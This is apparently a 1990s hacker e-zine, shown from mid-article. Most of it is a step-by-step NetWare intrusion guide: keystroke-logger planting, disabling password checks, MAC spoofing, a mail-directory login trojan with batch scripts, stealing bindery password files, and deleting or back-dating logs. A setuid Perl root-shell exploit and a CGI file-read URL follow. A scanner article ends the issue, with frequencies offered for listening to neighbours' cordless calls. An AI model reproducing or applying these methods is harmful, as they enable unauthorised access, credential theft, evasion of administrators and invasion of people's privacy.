(if you didn't have netscape) to open the com file from drive a: and save it in the same directory as startnet.bat. Note only write.exe not notepad.exe has the ability to save com files. In one swoop you have a dos-prompt and the network password, without the knowlodge of the administrator. The Execution Order of Dos Files -------------------------------- Remeber the execution order of dos files: 1. COM 2. EXE 3. BAT If you remember this, and if a full name of the file ie c:\nwclient\statnet.bat is not stated, a replacement com or exe file can be installed. To be a little smarter, few people have rights to novell operating system files but usually to spreadsheets or wordprocessors programs. Another useful idea, is in regard to modem programs. Most netware lans have modem programs loaded onto them. A simple trap would be to hide a com file, which would load before the exe. Load a keystroke trapper, and capture all passwords, etc etc that are passed over the modem. If the com file was hidden, and was used for only on a temporary basis, this could prove effective, depending on the skill of your administrator. Finding valid account's and password's -------------------------------------- To crack a novell network first of all you need an account. Trying the default supervisor and guest, would be the first place to start. Often the guest account will have no password. Beware of intruder detection. Others you might like to try include: Backup Fax Faxuser Faxworks Faxhq Hplaser Laser Laserwriter Post Print Printer Router Student Temp Test Wangtek Login security in layman term's consists of the following four steps: 1. The user logs into the network by specifying the file server name and username. The system verifies the username by matching it against an objsct in the NET$OBJ.SYS bindery file. Whether or not the username exists, Netware prompts for a password. 2. If the system verifies the username, it searches the NET$PROP.SYS file for a password property. If one exists, it responds with Password: If a password doesn't exist, the system jumps to step 4. 3. The user enters a password. If the username is valid, Netware compares this input to the value in NET$VAL.SYS (This database actually holds the encrypted passwords). IF the username is not valid, the system bypasses the search and responds with Access Denied. 4. If the user enteres the correct password for this username, they will be granted conditional access to the LAN. If not the system responds with access denied. Next the system matches the username with a variety of additional bindery values. Therefore you should notice that invalid usernames respond much more quickly with access denied, as netware doesn't search the bindery for invalid username passwords. Another way is to use the utility doskey. As most people will know doskey keeps your preivous commands in memory. A simple F7 will often reveal alot. Note if you do not wish anyone to follow your tracks, ALT+F7, will clear the memory. Install KeyStroke Trapper ------------------------- Installing a keystoke logger, is one of the most deadly hacking methods on IBM pc's. By looking at a config.sys and autoexec.bat, and the general layout of a pc, you can usually tell how advanced the user is. For example, lots of temp files in the root directory and little organisation of the startup files, this usually indicates the user would not notice if one one line was temporaly added to the autoexec.bat. Either way copy the keylogging program to the c:\dos directory. Rename it to something like doskey or mouse or someother tsr, copy the old file to *.old and hide it through "attrib +h", or remove it totally. Changing the date of the keylogging program and autoexec.bat to the original could also be options if needed. Brute Force Password Cracking ----------------------------- While I find this option is for the desprite it is still an option. The program nwpcrack.exe will take a dictionary and then attempt to guess a users password. Notice this could alert the administrator of your hacking presence if intruder detection is installed. Also if intruder detection is installed, this program will keep trying passwords even if the account has been locked. How to remove password validation --------------------------------- To disable password verification at the console: "left-shift""right-shift""alt""esc" To enter debugger type "c VerifyPassword=B8 0 0 0 0 C3" type "g" To restore password verification: type "d VerifyPassword 5" and write down the 5 byte respone type c VerifyPassword=xx xx xx xx xx" type "g" Ethernet address spoofing with ODI ---------------------------------- Source : Edited heavily from Phrack ?? by Otaku Login as GUEST or a normal account. Try to see who else is on the system. USERLIST /A >c:\ulist.txt will give you a list of users currently logged in, with their Ethernet card addresses saved to a text file . Your current connection will be marked with an asterisk. The security aware Novell supervisors, will have set up Backup ccounts with an extra level of security which restricts logins to only those Ethernet addresses which have been specified. The really sensible ones will have made sure that any such machines are sited in physically secure areas, as well. Although this is a very good idea, from the security point of view, Novell have now provided a mechanism which allows you to get around this: the replacement for monolithic IPX/NETX called Open Datalink Interface (ODI) Novell's ODI, and its slower Microsoft equivalent Network Driver Interface Specification (NDIS), both work by putting a common layer of software between the hardware of the Network Interface Card and the rest of the MSDOS Redirector. This allows multiple protocol stacks and frame types to be bound to the same physical card e.g. IPX TCP/IP NETBeui DECnet Appletalk Link Support Layer Hardware Specific device driver e.g. NE2000 Under ODI, to load your drivers to enter the network: LSL NE2000 IPXODI NETX With ODI, there are more parameters for NET.CFG but the worrying/interesting one is the ability to specify a different MAC level address to that of your actual Ethernet card. It needs this ability to cope with TCP/IP or DECnet coexistence e.g. BUFFERS 100 MACHINE TYPE COMPAQ PREFERRED SERVER FINANCE NODE ADDRESS AA-00-04-00-12-34 Since this DECnet address does not depend on the "real" unique Ethernet address which has been burnt into the PROM on the card and is centrally registered, this mechanism allows you to put a different Ethernet card address into NET.CFG, thereby fooling the Address Restriction security. e.g. NODE ADDRESS 02-60-80-12-34-56 This is where the data you gathered earlier with USERLIST and SYSCON becomes threatening/useful. Of course, if your target PC is on a different LAN segment, there may be Routers or intelligent hubs which restrict your ability to do this, or at least record attempts in a log files which can trace your activity, provided that suspicions are aroused before they are periodically wiped out. If you set this connection parameter to be the same as that of another PC, the fileserver (Novell, DEC or UNIX) and the Ethernet has no way of preventing some packets intended for just one unique address going to the other, if they are both online at the same time. This usually results in PC hangs, incomplete closure of files, File Allocation Table problems. If by accident or design, you set your PC to have the same address as the fileserver (Novell, DEC or UNIX) or a router, then you can cause havoc to the whole network segment. Checking your rights in Certain Directories ------------------------------------------- As previously stated, use "whoami /a" to list the groups you belong to, security equivalences, and your effective rights. The sys:system directory If you have rights to f:\system, try to grab the rconsole password in the autoexec.ncf, or the bindery files in the same directory. Note these are hidden files *.sys. To view them "ndir /h" which view all hidden files. The sys:login directory If you have access to this directory, well .... Abusing the Mail Directory Rights --------------------------------- Most of this attack is taken from the Netware Hack FAQ. In 3.x the group EVERYONE has Create rights in SYS:MAIL. This means the user (including GUEST) has the ability to write files to any subdirectory in SYS:MAIL. The first versions of Netware included a simple e-mail package, and every user that is created gets a subdirectory in mail with RCWEMF, named after their object ID number. One consistent number is the number 1, which is always assigned to Supervisor. Here's one way to exploit it: - Login as GUEST and change to the SYS:MAIL subdirectory. - Type DIR. You will see one subdirectory, the one owned by GUEST. Change into that directory (ex. here is C0003043) - Type DIR. If there is no file named LOGIN, you can bet there may not be one for Supervisor. If there is a default-looking LOGIN file, even a zero length file, you cannot proceed. - Copy PROP.EXE and LOGIN.EXE (the itsme version) to SYS:MAIL\C0003043 - Create a batch file (ex. here is BOMB.BAT) with the following entries: @ECHO OFF FLAG \LOGIN\LOGIN.EXE N > NUL COPY \MAIL\C0003043\LOGIN.EXE \LOGIN\LOGIN.EXE > NUL FLAG \LOGIN\LOGIN.EXE SRO > NUL \MAIL\C0003043\PROP -C > NUL - Create a LOGIN file with the following entries: MAP DISPLAY OFF MAP ERRORS OFF MAP G:=SYS: DRIVE G: COMMAND /C #\MAIL\1\BOMB DRIVE F: MAP DELETE G: - Now copy the files to the Supervisor's SYS:MAIL directory from a drive mapped to the SYS: volume. TYPE BOMB.BAT > \MAIL\1\BOMB.BAT TYPE LOGIN > \MAIL\1\LOGIN - The next time the Supervisor logs in the LOGIN.EXE is replaced and the PROP.EXE file is run, capturing passwords. Run PROP.EXE later to get the passwords, and then once you have all the passwords you need (including Supervisor) delete your LOGIN and BOMB.BAT file. Admins can defeat this by creating default personal Login Scripts or by adding an EXIT command to the end of the System Login Script. Later versions of Netware create a zero-length LOGIN file at ID creation time in the SYS:MAIL directories to defeat this. Strolling over to the Console ----------------------------- If the monitor has not been assigned a password, usually "secure console" would not be loaded. This stops nlms from being loaded from drive a: or any other directory than sys:system. If a password has been assigned, ops reboot the server an there will not be a password. To add a user from the console use burglar.nlm. This will create a super-user of your choice. To change any users password use setpwd.nlm. Hack.exe ... no Packet Signatures --------------------------------- If you are on a 3.1x network and no packet signatures are loaded, you can easily become supervisor. The only problem is that all users will become supervisors. Attacking the Console through Rconsole -------------------------------------- 1. Login as guest, or any user and check if accounting is installed. 2. Load rconsole, sometimes this requires supervisor rights depending on the version of rconsole you are using. 3. Attempt the password, remote, /p= or /s= are often used. It should be noted that if you can capture an rconsole session with an ethernet analyser, the rconsole password can be extracted. Refer to rconfaq.zip below.. 4. Once you have the correct password, type "modules", and view what is loaded. If conlog.nlm is loaded unload it. Get a feel for what is loaded, type "config" this will tell you what protocols are loaded. 5. Load burglar.nlm or setpwd.nlm, to create a new user or change the password of another. 6. If conlog was not loaded, "load delay 30 cls", therefore when you exit rconsole no tracks will be left behind. 7. Exit rconsole, login and do what you will. 8. Clean the logs, sys:system\sys$log.err, delete and purge and nlms loaded. 9. If conlog was loaded, enter rconsole and downing the server is an option to clear the log file. Cracking the Bindery Files -------------------------- FS3/SYS:SYSTEM Files: Size Last Updated Flags Owner ----------------- ------------- --------------- -------------------- --------- NET$OBJ SYS 7,360 2-09-96 11:30p [Rw-A-HSy-T--------] SUPERVISOR NET$PROP SYS 25,364 2-09-96 11:30p [Rw-A-HSy-T--------] SUPERVISOR NET$VAL SYS 108,914 2-12-96 10:23a [Rw-A-HSy-T--------] SUPERVISOR These are the bindery files for novell netware and despite somewhat unpopular belief, it is possible to crack password unix style by obtaining the password files. How to close and copy the bindery files. Create the following batch file: @echo off bindclos cd\system flag net$obj.sys -hsyt flag net$prop.sys -hsyt flag net$val.sys -hsyt copy net$obj.sys a:\ copy net$prop.sys a:\ copy net$obj.sys a:\ flag net$obj.sys +hsyt flag net$prop.sys +hsyt flag net$val.sys +hsyt bindopen Note that bindclos and bindopen are part of the jrbutils. Also openning and closing the bindery will create messages in the log file sys:system. The problem here is that the sys:system directory is restricted. Syscon - Clear text passwords ----------------------------- Older versions of SYSCON like the one shipped with NetWare 3.11 - version 3.62, I believe, encrypt the passwords so they are not in clear text accross the network. The version that ships with NetWare 3.12 (3.75) certainly does not encrypt the passwords, therefore passwords can be captured by enternet sniffers. Pmail ----- --- From a local source --- Subject: Re: students breaking into network through pmail I would recommend creating a rules.pmq file in all users mail directories to prevent this. Even if a user doesn't have supervisor rights, you could have the program do a number of things. If nothing else, they could have the user delete all the mail files. The easiest way that I could think of doing this would be to create a rules.pmq file and then copying it into each users mail directory. This could be done by creating a dummy rules.pmq file, and use a program like pcmag's sweep program. F:\MAIL>sweep if not exist rules.pmq copy \mail\1\rules.pmq I don't know if creating a zero byte rules.pmq would work with pegasus. It might not like a zero byte file, and you can copy a zero byte file. Perhaps it would be best to have Pegasus mail create an empty rules file if one doesn't exist to prevent this. That would be the easiest thing to totally solve the problem. > I have recently caught a student using the following procedure > > create a rules.pmq in their own a account that sets up a rule to execute > a program on receipt of any mail. the program run line is > > COMMAND /C H:\MAIL\target users mail dir\gotya.bat > > they then copy this rules.pmq into a users mail directory (ONLY WORKS IF > USERS DOES NOT HAVE A RULES.PMQ ALREADY) they then create a gotya.bat in > the target users mail directory to do anything they want. > > I tested and was able using the guest account which has C rights in the > mail dir to copy John Bairds (JRB UTILS) SETEQUIV into a supervisor > equivs mail directory plus a batch file the when run it would change > guest to be a supervisor equivelent. Copied a rules.pmq to run this > batch file. then delete all related files. > > When the super equiv read their mail (as I watched!) the screen went > black as the rules were processed and then carried on. No indication of > what had been done to the super user but guest had super rights. > > has any one else tried this or seen this? The only way to stop this was > to copy a empty RULES.PMQ into each users mail dir. > --- End excerpt --- Problems with the netware http ------------------------------ Subject: *** SECURITY ALERT *** I spent some time exploring Novell's HTTP server and out of the box there is a CGI that is VERY VERY INSECURE!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! If you are running the Novell HTTP server, please disable the CGI's it comes with it until you understand (fully understand) what the security risks are. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! The CGI in question is convert.bas (yes, cgi's in basic, stop laughing). (There may be more CGI's in the scripts dir that can be exploited but this was all I could stomoch.) A remote user can read any file on the remote file system using this CGI. This means that if you are running the Novell HTTP server and have the 'out of box' CGI's, you are breached. Exploit code: http://victim.com/scripts/convert.bas?../../anything/you/want/to/view How a Uebercracker keeps his rights =================================== Trojaning the Netware Login Process ----------------------------------- If you have attained supervisor status, it is relativly easy to trojan the login process to reveal all users passwords to any user. This is done throught the utilisation of two utilities written by itsme. Firstly a replacement login.exe and prop.exe to create a property in the bindery to hold the clear passwords. Here is the process: 1. Note the original login.exe's file dates and owner. 1. Copy the trojaned login.exe to the sys:login directory, and use filer to change file's date's and owner to that of the original login.exe. 2. Flag the trojaned login.exe "ros" through flag login.exe +sro. 3. Run "prop -c" to create the new property from a floppy disk. 4. Purge the original login.exe 5. At any time with any rights "prop -r" will retreive a list of users and passwords. Super.exe --------- Allows a user to switch supervisor equivalence on and off. The user must already be supervisor equivalent, the first time it is used. Super changes the users bindery entry under NW 2.X and 3.1X up to 3.11 to allow it to toggle supervisor equivalence. Under 3.12 Novell, prevented this modification so instead Super makes the user a manager of both supervisor and his/her own usercode. Where are those error logs and what do they log ? ------------------------------------------------- Part of this is taken from Edinburg Tech Library FS3/SYS:SYSTEM Files: Size Last Updated Flags Owner ----------------- ------------- --------------- -------------------- --------- SYS$LOG ERR 78,684 2-09-96 11:30p [Rw-A--------------] SUPERVISOR 78,684 bytes in 1 files 81,920 bytes in 20 blocks System error log. This file is an ascii file and is readable by any standard editor or viewer. Can be read from within SYSCON/Supervisor optioins/View file Server Error Log. After reading press ESCAPE to exit. You will be prompted to clear the error log. Answer yes or no It contains entries of events such as Intruder Lockouts, volume mounts and dismounts. A better way to edit log files is to load "filer" before you edit the file. Note the dates created, last access and who owns the file. Then edit the file, re-enter filer and change the dates/owner back to the originals. Here are some example entries in the system logger: 8/19/95 1:29:22 pm Severity = 4. 1.1.136 FS3 NetWare Copyright Violation! Call SUPERVISOR! Server at address FACADE99:000000000001 also has my serial number 12/14/95 1:03:01 pm Severity = 0. 1.1.110 System time changed by station 25 to 12/14/1995 12:52:48 pm 2/8/96 11:30:43 pm Severity = 0. 1.1.63 Bindery close requested by user BACKUP on station 34 2/8/96 11:30:45 pm Severity = 0. 1.1.61 Bindery open requested by user BACKUP on station 34 2/9/96 2:08:13 pm Severity = 0. 0.0.0 Remote Console Connection Granted for 00000002:0000E8CF7661 2/9/96 2:08:24 pm Severity = 0. 0.0.0 Remote Console Connection Cleared for 00000002:0000E8CF7661 FS3/SYS:SYSTEM Files: Size Last Updated Flags Owner ----------------- ------------- --------------- -------------------- --------- NET$ACCT DAT 34,528 2-12-96 3:00p [RwSA-----T--------] FS3 34,528 bytes in 1 files 36,864 bytes in 9 blocks Netware audit trial. If accounting is installed on the server than all logins and logouts are recorded here along with disk read and writes if charging is in force. Note the file is flagged with a T meaning transactional file, and cannot be deleted when this attribute is set. To remove this flag the file : flag net$acct.dat -t and then delete the file. The system will generate a new file flagged appropriately at the time of the next event. FS3/SYS: Files: Size Last Updated Flags Owner ----------------- ------------- --------------- -------------------- --------- TTS$LOG ERR 7,828 2-02-96 1:16p [RwSA--------------] SUPERVISOR 7,828 bytes in 1 files 8,192 bytes in 2 blocks Here are some example entries in the transactional log.: Friday February 2, 1996 1:17:50 pm TTS has been shut down Friday February 2, 1996 1:16:23 pm Initializing Transaction Tracking System FS3/SYS: Files: Size Last Updated Flags Owner ----------------- ------------- --------------- -------------------- --------- VOL$LOG ERR 14,009 2-02-96 1:16p [RwSA--------------] SUPERVISO 14,009 bytes in 1 files 16,384 bytes in 4 blocks In the root of each volume there exists an ascii file vol$log.err. This records the date and time of the last known good mount of that particular volume. Where a volume is not preceded by a volume dismount, assuming that this is not the start of anew file, this is an indication that a server crach or abend has occured. Here are some example entries in the volume logger: Volume SYS mounted on Monday August 7, 1995 4:43:52 pm. Volume SYS mounted on Monday August 7, 1995 5:17:01 pm. sys:\etc\conlog.log An site running conlog.nlm will have a console log file. This file logs all activities on the console. When conlog.nlm is loaded, the log file is zero bytes and can be typed, but not edited. To edit the log file, the nlm must be unloaded from the console. When downing the server if conlog is not unloaded an error message is sent to the console. To defealt console login, down the server through the following commands. Remove Dos Down Exit This will work due to the fact that the console.log is deleted and re-created every time the conlog is loaded. A listing of what some utilities can do to penetrate Novell Netware ------------------------------------------------------------------- Trojan the Netware login process Netware Password cracker, that encypts password attempts Key Stroke Logger Delays NLM commands on the console Check for null passwords. How to break the rconsole encryption. Break the rconsole encryption. Create a super-user from the console. Change any users password from the console. Become super-user on 3.11 without Packet Signatures. Grant super rights, them allow them to be toggled. Create a temporary file server. Remove the delete inhibit flag. Play with Netware's bindery. There is a set of utilities called the JRButils. The lastest version being V2.30. Please sent comments or suggestions to diceman@fl.net.au ._________________________________________________________________________. -= CERT Advisory Snippet Issue #1 -= Perl Exploit The relevance CERT Advisory is CA-96.12. The vulnerability results in anyone with access to an account gaining root access. Within the next issue, there should be a detailed explaination of the exploit. <------------------------------- cut ----------------------------------------> #!/usr/bin/perl -U # Remember to chmod 4755 # # This exploit is a little aged although it might work. # $ENV{PATH}="/bin:/usr/bin"; $>=0; $<=0; exec("/bin/bash"); <------------------------------- cut ----------------------------------------> Every month we will be investigating recent CERT advisorys & reporting back the bugs & the patches. .____________________________________________________________________________. /-\./-\./-\./-\./-\./-\ | Scanning Made Easy | | By Myst | \-/.\-/.\-/.\-/.\-/.\-/ This is an article to help you novice scanner people out there get the most when buying and using your scanner (I don't mean picture scanning either;) -= What are scanners? =- Scanners are a device used to receive all those wonderful radio signals that pass through our bodies every second of everyday. They are capable of receiving only, therefore are NOT illegal (Although some scanners which can reach the mobile phone frequencies are now considered illegal). They allow the user to hear the wonders of the city around them, before the news and radio stations even know whats going on. By listening in to the police (not illegal:), fire departments, telstra and even TV stations etc you are able to hear all the latest and greatest news.... Car crashes, Armed Robbery, Domestic Disputes, even hear the cops bitchin' over who ate the last doughnut :) -= Where can I get one of these wonderful devices? =- Well, if your the rich and lazy type, try your local Dick Smith store (What don't they hold??:), or if you prefer to get something a little more worth the value, try speciality shops that stock amateur radio equipment, they are bound to have better prices, but you never know, shop around a bit first. You can even order them off the internet (I think), but thats at your own risk. It is also possible that some old (often still good in value) scanners are available at HAM conventions. This is basically just a get together of Amatuer Radio guys/gals to sell off old equipment and have some fun on the activities. Even look in the paper, you just never know (New scanners are made to not access in the mobile phone frequencies, but the older ones still can, so they are sometimes a better buy). -= What should I look for when buying a scanner? =- Well, it does kinda depend on the price range and whether you wont a portable or base station type (portables can be taken with you on your trips around the world, whereas a base station is placed at one location and usually not moved). The major pros with portables is that they are usually cheaper and can be taken to sporting events etc, but they often compromise a bit in the quality and clearness of the signal (this also depends on the brand of scanner and the antennae in use). Because base stations are rarely moved around, it is wise to have a mounted antenna somewhere on your roof. This gives better range and is especially good for picking up those city transmissions from within the country. This often makes base station models a wiser choice, but there is nothing stopping you from using a roof mounted scanning antenna with your portable whilst at home, and then a little rubber duckie (flexible antenna for those who dont know) or similar whilst outside soaking up the sun. Also, base stations often have extra features that are not found on some portable models. Sum up your own needs and decide which would be better for you. -= What brand should I get? =- Generally stick with Uniden, Cobra etc. It again depends on price and the functions you may want (See below). Ask around a bit and see what the dealers can do for you. Generally radio equipment is always pretty good on the quality side, but like always there are some that dont quite cut it. -= What functions are available in scanners? What functions will I want? =- Most (all?) scanners have the ability to store frequencies. You WILL want this. It is pretty much a standard thing. The older models start off with a 16 channel memory, with some of the later models having 100, 300 or even 500 channel capacities. You program these memory channels with desired frequencies, then you can make your scanner scan them for any activity. Different model scanners can scan these memories faster than others. Other important features include: Data Skip - This feature allows the scanner to skip over unwanted data transmissions and substantially stops you from hearing interference signals or annoying signals. Priority Channels - These are programmed with the most important frequencies. Then whilst monitoring other stuff, the scanner can be made to check these for activity automagically, every few seconds. Useful feature. Progamable Searching - This allows you to search between two frequencies, for activity. Channel Lock out - lock channels, so that they are not scanned. Automatic Store - Automatically searches out and stores frequencies to an available channel location and automatically return to find the next active frequency. Plus I am sure there are other features, depending upon the make and model. Ask the sale guy if your not sure. Hell thats what they are there for :) -= I have a scanner, but now what? =- OKEY! You have a scanner, lets get on the road! but wait, you dont want to sit around all day searching for 'interesting' frequencies to watch, that could take forever. Luckily for us, there are people in this world who either through torture or work (maybe both:) make up frequency lists and distribute them. I know that Dick Smith stocks 'some' frequency books, but these you have to pay for (who wants to pay for things in this world?), so check with local bulletin boards, the Internet (NO, not that word again;), friends, relatives, strangers, leave messages, you get the picture. Eventually you *WILL* find frequencies for your area. If you live in or near major cities, then I can guarantee you that there are frequency lists for your area. I will even include some with this article (I am a generous kind of guy). You want frequencies! Then frequencies you will get! First a few rules to 'safe' scanning, yes they must be told :) * Dont get in the way of emergency people! If you hear of a fire or whatever, think twice before rushing out and getting in the way. Just use your brain, thats all I am saying :) * Don't poke your rubber duckie antenna in your eye (yes they do hurt;) * Computers and the like can interfere majorily with the operation of scanners, causing unwanted interference, so generally keep them separated. * Always strap your scanner on your side, before leaving the house, unless you plan on going to: 1. Your girlfriends house 2. A party 3. A fun park 4. Anywhere you might end up pissed :) Now, on with the list! These are just frequencies I have collected from numerous sources over the years. I dont guarantee any of them. Most are fairly recent though and *should* work. This is by far not a complete list (it comes nowhere close). To find more comprehsive lists, try the web/ftp links at the bottom of the article. -= POLICE =- 123.100 VKC MELBOURNE 123.200 VKC MELBOURNE 131.600 VKC MELBOURNE 156.375 VKC MELBOURNE 123.100 VKC MELBOURNE 123.200 VKC MELBOURNE 131.600 VKC MELBOURNE 156.375 VKC MELBOURNE 156.675 VKC MELBOURNE 156.725 VKC MELBOURNE 168.250 VKC MELBOURNE 168.400 VKC MELBOURNE 413.975 VJV434 MELBOURNE 450.525 VKC MELBOURNE 450.650 VKC MELBOURNE 450.675 VKC MELBOURNE 468.000 - 470.000 VKC MELBOURNE 852.7875 VKC MELBOURNE 467.850 PERTH 467.875 PERTH 467.900 PERTH 467.925 PERTH 467.950 PERTH 467.975 PERTH 468.000 PERTH 468.025 PERTH 468.050 PERTH 468.075 PERTH 468.100 PERTH 468.125 PERTH 468.150 PERTH 468.175 PERTH 468.200 PERTH 468.225 PERTH 468.250 PERTH 468.275 PERTH 468.300 PERTH 468.325 PERTH 468.350 PERTH 468.375 PERTH 468.400 PERTH 468.425 PERTH 468.450 PERTH 468.475 PERTH 468.500 PERTH 468.525 PERTH 468.550 PERTH 468.575 PERTH 468.600 PERTH 468.625 PERTH 468.650 PERTH 468.675 PERTH 468.700 PERTH 468.725 PERTH 468.750 PERTH 468.775 PERTH 468.800 PERTH 468.825 PERTH 468.850 PERTH 468.875 PERTH 468.900 PERTH 468.925 PERTH 468.950 PERTH 468.975 PERTH 469.000 PERTH 469.025 PERTH 469.050 PERTH 469.075 PERTH 469.100 PERTH 469.125 PERTH 469.150 PERTH 469.175 PERTH 469.200 PERTH 469.225 PERTH 469.250 PERTH 469.275 PERTH 469.300 PERTH 469.325 PERTH 469.350 PERTH 469.375 PERTH 469.400 PERTH 469.425 PERTH 468.400 SYDNEY 468.525 SYDNEY 468.950 SYDNEY 468.450 NTH SYDNEY 468.200 NTH SYDNEY 468.925 NTH SYDNEY 468.725 SYDNEY 467.900 SYDNEY 469.300 SYDNEY 468.075 SYDNEY 467.950 SYDNEY 468.750 SYDNEY 468.700 SYDNEY 468.000 SYDNEY 468.425 SYDNEY 469.275 SYDNEY 468.675 SYDNEY 468.375 SYDNEY 468.550 SYDNEY 469.075 SYDNEY 468.475 SYDNEY/CAR 2 CAR 468.775 SYDNEY/CAR 2 CAR 458.950 Alice Springs / N.T. 458.975 Alice Springs / N.T. 468.450 Alice Springs / N.T. 468.475 Alice Springs / N.T. -= AMBULANCE =- 412.5000 VL3NE MELBOURNE 412.5250 VH3HYA MELBOURNE 412.7500 VL3NE MELBOURNE 413.0750 VL3NE MELBOURNE 413.3500 VL3NE MELBOURNE 413.4250 VL3WX MELBOURNE 470.4000 VM3SJ MELBOURNE 470.9750 VM3SJ MELBOURNE 453.825 Northern Territory 454.125 Northern Territory 462.950 Alice Springs 463.325 Northern Territory 463.625 Alice Springs -= FIRE BRIGADE =- 458.275 MELBOURNE 457.975 MELBOURNE 457.375 MELBOURNE 455.575 MELBOURNE -= Mobile Phonez! =- Okey, I dont have much info here, except the stuff from personal experience. For starters, every scanner sold now days will not go within the mobile phone range. So you might need to look around for some older models, but make sure to check out in the manuals whether or not they can reach up to the 800 - 900MHz range. Many Amatuer Radio handhelds and others can also get in the mobile area (If you have your Amateur license of course). Only analog phonez can be heard from scanners (digital make use of encryption techniques, so they can be picked up, just not understood). The only frequency I have experienced mobiles on is between 914.000 and 931.000. The mobile towers seem to pick a frequency between this range, depending upon the amount of traffic or wotever. So there is no set frequency that you can always find the phones on. Scan between those two continuously and you are bound to get something (In my area anyway). I have no idea whether these are different in other city's (Someone may want to help me out with all this). Just try it and see what you get. Also, it is common (where I live anyway) for the phones to 'drop-out' while someone is in the middle of a conversation and go to another frequency. A series of 'beeps' is heard a minute or so before this happens. The only explanation I have for this is that the mobile phone becomes closer to a different cell and so switches (the new cell choosing a different frequency). Someone wanna help me out here too? I think I need to do a Telstra course or something :) -= Amateur Radio Repeaters =- These are sometimes interesting to listen to (I emphasis the 'sometimes':) Instead of re-typing all these out, you can find them in the back of your handy 'ol Dick Smith book. Also contained in that book are the UHF CB Repeater listings and some various other stuff. Repeaters are just a device that picks up an input signal from one freq. and then re-transmitts that signal with higher power on another freq. This allows someone with only a small handheld radio to be picked up by someone a hunderd km's away. -= Telstra Stuff =- I dont have any! I want some! Can someone please give me some info on Tesltra's frequencies. Like the one used by the repair crews etc (Preferably for Melbourne, but hey, I'll take what I can get :) -= Airports =- Whenever you go to an airport TAKE YOUR SCANNER. There a great place for all sorts of interesting transmissions. For instance, the planes, airtraffic controllers, ground people (including refueling trucks etc), P.A systems, weather reports plus more! You might even be able to hear some of the radars active - Ground, long distance etc. 118.200 Avalon Airport 120.100 Avalon Airport 314.600 Avalon Airport 130.600 130.650 Ansett / Tullarmarine 130.950 Ansett / Tullarmarine 461.425 Ansett / Tullarmarine 463.675 Ansett / Tullarmarine 470.175 Ansett / Tullarmarine 471.925 Ansett / Tullarmarine 131.900 Qantas / Tullarmarine 166.660 Qantas / Tullarmarine 461.100 Qantas / Tullarmarine 464.950 Qantas / Tullarmarine 465.625 Qantas / Tullarmarine Most airport activity seems to be between the 120.000 and 135.000 range. -= FUN STUFF =- < Cordless Telephones - Hear your neighbours > Base Unit Only 30.075 30.100 30.125 30.150 30.175 30.200 30.225 30.250 30.275 30.300 Also try these: Base Handset 43.72 48.76 43.74 48.84 43.82 48.86 43.84 48.92 43.92 49.02 43.96 49.08 44.12 49.10 44.16 49.16 44.18 49.20 44.20 49.24 44.32 49.28 44.36 49.36 44.40 49.40 44.46 49.46 44.48 49.50 46.61 49.67 46.63 49.845 46.67 49.86 46.71 49.77 46.73 49.875 46.77 49.83 46.83 49.89 46.87 49.93 46.93 49.99 < CB's (Who'd wanna listen to them anyway) > 01 - 26.965 11 - 27.085 21 - 27.215 31 - 27.315 02 - 26.975 12 - 27.105 22 - 27.225 32 - 27.325 03 - 26.985 13 - 27.115 23 - 27.255 33 - 27.335 04 - 27.005 14 - 27.125 24 - 27.235 34 - 27.345 05 - 27.015 15 - 27.135 25 - 27.245 35 - 27.355 06 - 27.025 16 - 27.155 26 - 27.265 36 - 27.365 07 - 27.035 17 - 27.165 27 - 27.275 37 - 27.375 08 - 27.055 18 - 27.175 28 - 27.285 38 - 27.385 09 - 27.065 19 - 27.185 29 - 27.295 39 - 27.395 10 - 27.075 20 - 27.205 30 - 27.305 40 - 27.405 < McDonalds - Drivethru staff > These are pretty low powered things, so dont expect to get them from your house (Unless, god forbid, you live next door to a McDonalds store). So get about half a kilometer away at the most (200 meters might be better) Also, some of the stores may use simplex systems (Transmit on one frequency receive on another). Just see how things go. 30.840 31.000 33.140 35.020 -- Try this one first 40.430 151.715 151.775 151.895 154.060 154.570 154.600 154.700 165.600 169.445 467.775 457.550 McDonalds Wireless Mic Freqs. 170.245 170.305 171.105 171.905 Another great trick with these is to find the frequency of the mic you talk into and turn your scanner right up on this frequency. Put it close to your window, then go through the drivethru. When the lady/man asks for your order, and you speak a nice lot of feedback is sent to them :) Could be fun (Thanx to BlkGriff for that idea, although some others did mention it as well) < Kids Walkie Talkies > Some of these operate on AM, generally somewhere close to the CB frequencies. Some also operate on FM, close to 50 MHz (Some times it is written on the back of the units). Anything that creates RF energy can be received. So get out that old Jet Hopper controller, scan for your computer, probably even your microwave.. -= MiSc INfo =- < POLICE > If you hear a short burst of 2000Hz tone it means: 1 tone : memo for all cars 2 tones: hold up alarm or serious crime 3 tones: Officer needs urgent help Also, the police use a code system to abbreviate things. eg. Car 301 code 1 The list of codes I have is about 3 years old, but here it is: 1 On Patrol 24 Suspect on premises 2 In Office 25 Suspect disturbed 3 At Station 26 Brawl 4 Away vehicle check 27 License offence 5 Away premises check 28 Omission Signal 6 At Court 29 Gaming Offence 7 Mobile to office 30 Drunk 8 Mobile to residents 31 Operational exercise 9 ? 32 Drowning 10 Domestic disturbance 33 Deceased 11 Armed suspect 34 Wilful Damage 12 Vehicle accident 35 Knifing 13 Ambulance 36 Larceny (Theft) 14 Assault and robbery 37 ? 15 Alarm - silent 38 ? 16 Ambulance required 39 Suspicious vehicle 17 Alarm - audible 40 Fingerprints 18 Assault 41 ? 19 Officer requires assistance 42 Escapee - Military 20 Burglary 43 Fire 21 Vessel in trouble 44 ? 22 Provide transport 45 Escapee - Mental 23 Peeping Tom 46 Drunk driver 47 Escapee - Civilian 60 Incident at ... 48 Explosion 69 Homicide 49 ? 70 Smash and grab 50 Breaking 71 Special duty 51 Indecent exposure 73 Robbery 52 ? 74 Rape 53 Hit & Run 78 Loitering 54 ? 79 Shooting 55 Indecent assault 80 Warrant at .. 56 ? 81 Wanted, detain 57 ? 86 Wanted: Felony 58 Indecent behaviour 87 Wounding 59 ? 88 Wanted: warrant for misd 97 Plane overdue 98 Plane crash impending 99 Plane crash.. 200 Station car 400-449 Boat Squad 300 Divisional Van 470-499 Air wing 400 Crime car 500-539 Licensing 500 C.I.B 100---- Exercise/Inspector 600 Community Policing 560-569 Gaming 700 Special Duty/Solo 570-599 Vice 800 Foot Patrol 600-699 Women 900 Station radio 